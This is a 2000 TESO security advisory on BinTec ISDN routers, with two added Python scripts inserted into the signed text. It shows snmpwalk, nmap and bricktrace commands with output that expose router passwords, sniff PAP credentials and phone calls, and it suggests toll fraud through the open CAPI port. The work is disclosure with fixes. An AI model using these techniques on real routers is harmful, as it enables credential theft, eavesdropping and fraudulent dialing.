TESO Security Advisory #9 - BinTec router security and privacy weakness. By using SNMP brute-force-techniques for SNMP community-names one is able to remotely gain the management accounts passwords, which are the same as the SNMP community names. Additionally the MIB-Tree holds security related information which should not be accessible through read-only/SNMP. These routers also offer services which can be abused rather easily, like dialing out and getting full line access via a CAPI interface, or a debugging interface which gives you all information which is sent over the BRI-lines.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------
TESO Security Advisory
2000/03/30
BinTec router security and privacy weakness
Summary
===================
By using SNMP brute-force techniques against SNMP community names, one is able
to gain the management account passwords, which are the same as the SNMP
community names.
Additionally, the MIB tree holds security-related information which should
not be accessible through read-only SNMP. These routers also offer services
which can be abused rather easily, like dialing out and getting full line
access via a CAPI interface, or a debugging interface which gives you all
information that is sent over the BRI lines.
(Those services are open by default, and the debugging service is barely
documented.)
Systems Affected
===================
BinTec ISDN router family
tested: BIANCA/BRICK-XL
BIANCA/BRICK-XS
Tests
===================
(1) Example system setup for examples given
___________________________________________________________________________
admin Login Password/SNMP Community bitkoenig
read Login Password/SNMP Community rince
write Login Password/SNMP Community guenthi
Defaults are: admin/bintec, read/public and write/public.
(2) Example of Read-Only SNMP output from a BinTec router
___________________________________________________________________________
syslog:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
[...]
enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
local IP address is 195.202.40.124, remote is 195.202.32.121"
enterprises.272.4.1.12.1.4.954440116.7.40 =
"LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
enterprises.272.4.1.12.1.4.954440685.7.41 =
"LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
enterprises.272.4.1.12.1.4.954440692.7.42 =
"citykom-muenster: outgoing connection closed, duration 583 sec, 18194
bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
enterprises.272.4.1.12.1.4.954440692.7.43 =
"ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
609910,7/0,0,0B,citykom-muenster"
[...]
capi-user-db:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
/* username */
enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
/* password */
enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
/* capi access activated */
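The walk above is worth auditing mechanically: the row index encodes the username as a length byte followed by the ASCII codes (7.100.101.102.97.117.108.116 is "default"), and columns 1, 2 and 6 carry the username, the password and the CAPI access flag as annotated above. The following audit script is an added example, not part of the advisory or of any BinTec tool. It parses snmpwalk output for this table, groups rows by user and flags accounts that are dial-out capable without a password, as well as the fact that any set password is disclosed through the read-only community at all. The index layout and the column meanings are inferred from the advisory's output; the rows for "ops" and "guest" are constructed to exercise the other branches.

```python
"""Audit a BinTec capi-user-db SNMP walk (read-only community) for weak entries."""
import re
from typing import Dict, List, Optional, Tuple

# Table prefix exactly as it appears in the advisory's snmpwalk output.
CAPI_USER_PREFIX = "enterprises.272.4.7.8.1."

# Column meanings as annotated in the advisory (username, password, CAPI access flag).
# Other column numbers of this table are not known here and are ignored.
COLUMNS = {1: "username", 2: "password", 6: "capi_enabled"}

# Constructed sample walk: the 'default' rows are the advisory's own output,
# 'ops' and 'guest' are made-up rows for the audit's other branches.
SAMPLE_WALK = """\
enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
enterprises.272.4.7.8.1.1.3.111.112.115.0 = "ops"
enterprises.272.4.7.8.1.2.3.111.112.115.0 = "s3cret"
enterprises.272.4.7.8.1.6.3.111.112.115.0 = 1
enterprises.272.4.7.8.1.1.5.103.117.101.115.116.0 = "guest"
enterprises.272.4.7.8.1.2.5.103.117.101.115.116.0 = ""
enterprises.272.4.7.8.1.6.5.103.117.101.115.116.0 = 0
"""

LINE_RE = re.compile(r"^(?P<oid>\S+)\s*=\s*(?P<value>.*)$")


def decode_index(index: str) -> Optional[Tuple[int, str]]:
    """Split 'col.len.b1...bn.0' into (column, username).

    The layout (a length, that many ASCII codes, then a trailing 0) is inferred
    from the advisory: 7.100.101.102.97.117.108.116.0 decodes to "default".
    """
    parts = [int(p) for p in index.split(".") if p]
    if len(parts) < 2:
        return None
    column, length = parts[0], parts[1]
    raw = parts[2:2 + length]
    if len(raw) != length or any(b > 255 for b in raw):
        return None
    return column, bytes(raw).decode("ascii", errors="replace")


def parse_value(text: str):
    """snmpwalk prints strings quoted and integers bare."""
    text = text.strip()
    if len(text) >= 2 and text[0] == '"' and text[-1] == '"':
        return text[1:-1]
    try:
        return int(text)
    except ValueError:
        return text


def parse_walk(walk: str) -> Dict[str, dict]:
    """Group the table's rows by username into {user: {field: value}}."""
    users: Dict[str, dict] = {}
    for line in walk.splitlines():
        line = line.strip()
        if not line.startswith(CAPI_USER_PREFIX):
            continue  # other tables, '[...]' markers, wrapped value lines
        match = LINE_RE.match(line)
        if not match:
            continue
        decoded = decode_index(match.group("oid")[len(CAPI_USER_PREFIX):])
        if decoded is None:
            continue
        column, user = decoded
        field = COLUMNS.get(column)
        if field is None:
            continue
        users.setdefault(user, {})[field] = parse_value(match.group("value"))
    return users


def audit(users: Dict[str, dict]) -> List[str]:
    """Flag dial-out capable accounts without a password, and note that any
    password that is set is itself readable through the read-only community."""
    findings: List[str] = []
    for user, fields in sorted(users.items()):
        password = fields.get("password", "")
        enabled = fields.get("capi_enabled") == 1
        if enabled and password == "":
            findings.append(f"{user}: CAPI access enabled with empty password")
        elif password != "":
            findings.append(f"{user}: CAPI password readable over SNMP")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_walk(SAMPLE_WALK)):
        print(finding)
```

Feed it the saved output of the snmpwalk shown above; both findings it produces are reasons to close the SNMP port as described under 'Solution', since a "fixed" password is still exposed to anyone who guesses the read community.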
(3) Remote CAPI Server on a BinTec router
___________________________________________________________________________
fefe:> ps -elf
[...]
S 0 26 1 28 0 Jan 1 ? 00:00 00:00 vcapid
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 6000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp X11
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
(4) BrickTrace Server on a BinTec router:
___________________________________________________________________________
fefe:> ps -elf
[...]
S 0 24 1 28 0 Jan 1 ? 00:04 00:01 traced
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 7000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp afs3-fileserver
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
(5) BrickTracing a password from an outgoing PPP connection
___________________________________________________________________________
bitch:~$ bricktrace -h2pi 1 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 1 Unit 0 Slot 2 /* Tracing the B-Channel */
[...]
020721.320 X DATA[0025]
0000: ff 03 c0 23 01 01 00 15 08 73 68 6f 6c 74 77 69 ...#.....user
0010: 73 07 72 65 74 68 6f 6f 6f .password
PPP packet protocol 0xc023 (PAP)
ID 1 PAP Authenticate-Request Peer-ID user Password password
A=FF UI
[...]
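What the trace port hands out here is a raw PPP frame, and the PAP Authenticate-Request in it carries the peer ID and the password as plain length-prefixed strings. The following decoder is an added example, not part of the advisory or of the bricktrace tool: it rebuilds the frame from a dump in bricktrace's layout, reads the PPP protocol field (handling the one-byte compressed form that the page's later traces show as "Compressed PPP packet protocol 0x21") and, for PAP, extracts the credentials so the exposure is explicit. The trace record is constructed with the placeholder credentials user / password; the dump layout is assumed from the output above.

```python
"""Decode a bricktrace hex dump of a PPP frame and show what the trace exposes."""
import re
from typing import Dict, Optional

PPP_PAP = 0xC023   # Password Authentication Protocol (RFC 1334)
PPP_CHAP = 0xC223  # Challenge Handshake Authentication Protocol (RFC 1994)
PAP_CODES = {1: "Authenticate-Request", 2: "Authenticate-Ack", 3: "Authenticate-Nak"}

# Constructed trace record in bricktrace's layout (timestamp, direction, DATA[len],
# then 'offset: hex bytes  ascii' lines); no real account is embedded here.
SAMPLE_TRACE = """\
000000.000 X DATA[0022]
0000: ff 03 c0 23 01 01 00 12 04 75 73 65 72 08 70 61 ...#.....user.pa
0010: 73 73 77 6f 72 64                               ssword
"""

HEX_LINE_RE = re.compile(r"^[0-9a-fA-F]{4}:\s*(.*)$")
HEADER_RE = re.compile(r"DATA\[(\d+)\]")
HEX_BYTE_RE = re.compile(r"^[0-9a-fA-F]{2}$")


def parse_trace(record: str) -> bytes:
    """Rebuild the frame from the hex columns of a dump.

    Each dump line holds at most 16 bytes; the DATA[n] header gives the frame
    length, so the byte count per line is known and an ASCII-column token that
    happens to look like a hex byte cannot be mistaken for data."""
    expected: Optional[int] = None
    data = bytearray()
    for line in record.strip().splitlines():
        hex_line = HEX_LINE_RE.match(line)
        if hex_line:
            offset = int(line[:4], 16)
            limit = 16 if expected is None else max(0, min(16, expected - offset))
            for token in hex_line.group(1).split()[:limit]:
                if not HEX_BYTE_RE.match(token):
                    break  # ASCII column begins
                data.append(int(token, 16))
            continue
        header = HEADER_RE.search(line)
        if header:
            expected = int(header.group(1))
    return bytes(data)


def decode_pap(payload: bytes) -> Dict[str, object]:
    """PAP: code, id, length, then for a request: id-length, peer-id, pw-length, password."""
    code, ident = payload[0], payload[1]
    length = int.from_bytes(payload[2:4], "big")
    body = payload[4:length]
    info: Dict[str, object] = {"code": PAP_CODES.get(code, code), "id": ident}
    if code == 1:
        id_len = body[0]
        peer_id = body[1:1 + id_len]
        pw_len = body[1 + id_len]
        password = body[2 + id_len:2 + id_len + pw_len]
        info["peer_id"] = peer_id.decode("latin-1")
        info["password"] = password.decode("latin-1")
        info["credentials_exposed"] = True
    return info


def decode_ppp(frame: bytes) -> Dict[str, object]:
    """Strip the HDLC address/control bytes (ff 03) if present, read the protocol
    field (a single odd byte when protocol-field compression is in use, RFC 1661)
    and decode the authentication protocols that matter for this advisory."""
    if frame[:2] == b"\xff\x03":
        frame = frame[2:]
    if not frame:
        return {"protocol": None}
    if frame[0] & 0x01:
        proto, payload = frame[0], frame[1:]
    else:
        proto, payload = int.from_bytes(frame[:2], "big"), frame[2:]
    info: Dict[str, object] = {"protocol": proto}
    if proto == PPP_PAP:
        info.update(decode_pap(payload))
    elif proto == PPP_CHAP:
        info["note"] = "CHAP: challenge and response hash on the wire, not the secret itself"
    return info


if __name__ == "__main__":
    print(decode_ppp(parse_trace(SAMPLE_TRACE)))
```

Any PAP credential that has crossed a line whose trace port was reachable should be treated as disclosed; CHAP at least keeps the secret itself off the wire, but the real fix is closing port 7000 as given under 'Solution'.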
(6) Snooping an S0 Bus for telephone calls
___________________________________________________________________________
bitch:~$ bricktrace -h3 0 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 0 Unit 0 Slot 2 /* Tracing the D-Channel */
[...]
021096.656 R DATA[0015]
0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88 ...............
PD=08 Dest CR=01 SETUP ACKNOWLEDGE
IE-Element : Channel Identification :
Interface implicitly identified
Interface type S0
Channelnumber is exclusive (accept only this)
Identified Channel is not D-Channel
Selected Channel : B1-Channel
IE-Element : Progress Indicator reports
In-band information now available
[...]
021105.366 R DATA[0008]
0000: 02 b3 12 2e 08 01 81 02 ........
PD=08 Dest CR=01 CALL PROCEEDING
021108.076 R DATA[0012]
0000: 02 b3 14 2e 08 01 81 01 1e 02 82 88 ............
PD=08 Dest CR=01 ALERT
IE-Element : Progress Indicator reports
In-band information now available
[...]
021124.748 R DATA[0028]
0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c ........).....#L
0010: 0b 21 83 31 33 30 31 31 32 31 31 32 .!.130112112
PD=08 Dest CR=01 CONNECT
IE-Element : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
IE-Element : Unknown IE-Element 0x4c in Codeset 0
[...]
021130.282 R DATA[0045]
0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4 ...2...M........
0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01 7.."0...0.......
0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e (.0 Einheiten
PD=08 Dest CR=01 RELEASE
IE-Element : Facility
Service discriminator is supplement. application
Component tag is invoke
integer (0x2)
50231
integer (0x1)
34
sequence (0xa)
{
GetNextRequest (0x5)
{
sequence (0x3)
{
integer (0x1)
0
}
}
GetResponse (0x1)
}
IE-Element : Display : 0 Einheiten
[...]
(7) Checking line status from BinTec's httpd:
___________________________________________________________________________
[...]
Hardware Interfaces
Slot 1 Ethernet o.k.
Slot 2 ISDN S2M o.k. used 13, available 17
- - X X X X X - X -
- - X - X - - X - -
X - - - X - - X - X
[...]
Now we know what to sniff. Sniffing an inbound PPP connection on line 4, slot 2:
bitch:~$ bricktrace -h2pit 4 0 2
bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
Tracing: Channel 4 Unit 0 Slot 2
[...]
004419.999 X DATA[0045]
0000: 21 45 00 00 2c 39 07 40 00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
0010: 0d c2 61 45 28 00 50 da 79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
0020: 7a 60 12 44 70 3c z.Dp<
Compressed PPP packet protocol 0x21 (TCP/IP)
A=21 RNR P/F=0 N(R)=2
IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d protocol 0x6
TCP-Message, sourceport 80 destinationport 55929
sequence number 3170412967
acknowledgement number 36423034
offset 6 flags ACK SYN
window 17520 checksum 0x3c9e urgent 0
[...]
004420.640 R DATA[0609]
0000: 2d 70 0e b0 43 ff 47 45 54 20 68 74 74 70 3a 2f -p..C.GET http:/
0010: 2f 63 68 61 74 33 2e 70 6c 61 79 67 72 6f 75 6e /chat3.playgroun
0020: 64 2e 64 65 2f 63 d.de/c
Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
A=2D I P/F=1 N(R)=3 N(S)=0
0E B0 C FF G E T h t t p : / / c h a t 3
. p l a y g r o u n d . d e / c h a t
IP-Packet from a to b protocol 0x2f
[...]
Impact
===================
(1) SNMP communities / login passwords
___________________________________________________________________________
By using standard brute-force methods, the SNMP community string, and
therefore the login passwords, can be obtained. A program doing this is
for example ADMsnmp, which has to be fed a wordlist. Brute-forcing this way
is quite effective: you get about 500-1000 words per minute (which of course
depends on your and the router's connectivity). You can get this program
from [4]. Brute-forcing the passwords directly via telnet isn't possible
because the router slows down after approx. 6 tries.
(2) Using the CAPI facility
___________________________________________________________________________
Nearly any router can remotely be used as an 'ISDN line provider': you can
use the BRI lines of the router if they are not password protected.
In a short survey, most machines we encountered proved to be vulnerable,
i.e. they didn't have any restrictions set. The CAPI daemon listens on
port 6000, as you can see in the 'Tests' section.
This feature can, for example, be exploited by dialing expensive numbers
(0900 or 0190 [in DE] lines). You may also hide your real identity by
calling a 'call-by-call' ISP who gives you another IP address to work from.
A (R)CAPI library for Un*x exists which can be used for these attacks;
it is available via [5]. There is also a CAPI user interface for MS Windows,
called BrickWare, which can be obtained via [6].
Firmware before 5.1.x seems to be generally not passworded; we have not
checked 5.1.x yet.
(3) Using BrickTrace for snooping BRI-Lines
___________________________________________________________________________
You can gain information on the ISP or corporation running these routers
with open BrickTrace ports (port 7000 by default) with a program called
bricktrace, which is available via [7]. In the documentation this port
isn't even mentioned (!). See 'Solution' for how to turn off this port.
As you can see, the whole data passing the line is visible, so you also get
the users' passwords and see what they do on the net (it is in a way like a
dedicated sniffer). Using this technique of sniffing you may also see private
information of corporations, not restricted to Internet traffic but also on
'intranet' lines that use the same router, as well as telephony networks
(S0 bus).
Explanation
===================
BinTec Communications seems to rely on security by obscurity. Neither the
severity of these services nor how to configure them is mentioned properly
in their documentation.
However, BinTec routers *can* be secured; it just seems not to be common
knowledge.
In addition, it seems quite useless to provide RCAPI facilities on a router
which is mainly used for dial-in purposes. If one needs those abilities,
encrypted management access would be appropriate.
Solution
===================
SNMP:       disable                     (admin.biboAdmSnmpPort=0)
                                        (admin.biboAdmSnmpTrapPort=0)
RCAPI:      disable or password protect (admin.biboAdmCapiTcpPort=0)
BrickTrace: disable                     (admin.biboAdmTraceTcpPort=0)
Manage your router through the serial line only, because if your management
connection gets sniffed, these services can be reactivated with the captured
credentials.
Acknowledgments
===================
The bug discovery and the demonstration are due to Stephan Holtwisch [2].
This advisory has been written by Stephan 'rookie' Holtwisch and hendy.
Contact Information
===================
The TESO crew can be reached by mailing to teso@coredump.cx.
Our web page is at [1].
References
===================
[1] TESO
http://teso.scene.at/ or https://teso.scene.at/
[2] Stephan Holtwisch
sholtwis@muenster.de
[3] BinTec Communications
http://www.bintec.de
[4] ADMsnmp - bruteforce SNMP communities
ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
[5] libcapi for RCAPI (Unix)
ftp://ftp.bintec.de/pub/brick/libcapi/
[6] BrickWare (CAPI software for windows)
ftp://ftp.bintec.de/pub/brick/brickware/
[7] BrickTrace (BRI-Line snooping)
ftp://ftp.bintec.de/pub/brick/unixtool/
Disclaimer
===================
This advisory does not claim to be complete or to be usable for any
purpose. Especially information on the vulnerable systems may be
inaccurate or wrong. The supplied information is not to be used for
malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory should include
at least links [1] and [2].
- ------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE45biacZZ+BjKdwjcRAlQaAJ9ozxk8JlFuEZSA0br4u+d3+CbfgACgjLHx
fDJT2mFXDx4xRzzE7Da7pD8=
=d2XM
-----END PGP SIGNATURE-----